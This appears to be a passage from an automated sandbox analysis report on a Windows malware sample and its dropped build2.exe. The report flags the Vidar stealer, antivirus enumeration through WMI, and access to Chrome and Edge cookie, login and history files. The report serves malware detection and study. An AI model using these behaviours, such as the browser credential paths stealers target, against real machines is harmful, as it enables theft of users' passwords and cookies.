                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_00BC8423
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,0_2_00BC87C8
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,0_2_00BC884E
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_00BC7BB3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00BC7E83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,0_2_00BC7E27
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_00BC7F83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00BC7F00
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00320116
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00318178
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_003182A2
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0031834F
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00318423
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,2_2_003187C8
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,2_2_0031884E
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00317BB3
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,2_2_00317E27
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00317E83
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00317F00
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00317F83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00BD0116
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_00BC8178
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00BC82A2
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_00BC834F
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_00BC8423
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,3_2_00BC87C8
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,3_2_00BC884E
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_00BC7BB3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00BC7E83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,3_2_00BC7E27
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_00BC7F83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00BC7F00
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,4_2_0041205C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,4_2_0041614D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_00412173
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,4_2_00416100
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,4_2_00416119
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,4_2_0040A120
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetConsoleOutputCP,GetLastError,GetConsoleAliasesA,TlsGetValue,FindAtomA,FreeEnvironmentStringsA,LoadLibraryW,LocalUnlock,TryEnterCriticalSection,LocalFree,GetLocaleInfoW,SetCurrentDirectoryW,CreateWaitableTimerW,CompareStringA,GetLongPathNameA,HeapFree,_calloc,_calloc,_memset,_calloc,_feof,VirtualLock,4_2_00441932
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,4_2_00410A55
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_0041227F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,4_2_0041220B
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0041628C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,4_2_004173BC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_00412451
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,4_2_00410504
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,EnumSystemLocalesA,4_2_00412515
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0041253E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,4_2_004125E1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_004125A5
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,4_2_00417650
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_0040FE96
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,4_2_0041078F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_005DBC42
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,memcpy,memcpy,memcpy,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,5_2_0042D0A0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,5_2_0042B1C8
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,5_2_00416190
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,LocalFree,5_2_00416209
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0042B2A2
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0042D62C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_0042A698
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_0042D721
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_0042D7C8
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_0042D823
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_0042D9F4
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_0042A9B6
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_00429A0C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_0042DAE0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,5_2_00428A82
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,5_2_00430AA4
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,EnumSystemLocalesA,5_2_0042DAB7
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_0042DB47
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,5_2_00430BD9
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_0042DB83
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_004418E0 DebugBreakProcess,FreeEnvironmentStringsA,CreateNamedPipeA,4_2_004418E0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BC2283 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BC2283
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA9F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BBFE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00BBFE47
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA9F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00BA9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: build2.exe, 00000005.00000002.2908587009.00000000030D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7772, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7772, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7772, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E1307A sqlite3_transfer_bindings,5_2_61E1307A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D5E6 sqlite3_bind_int64,5_2_61E2D5E6
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D595 sqlite3_bind_double,5_2_61E2D595
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E0B431 sqlite3_clear_bindings,5_2_61E0B431
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E037F3 sqlite3_value_frombind,5_2_61E037F3
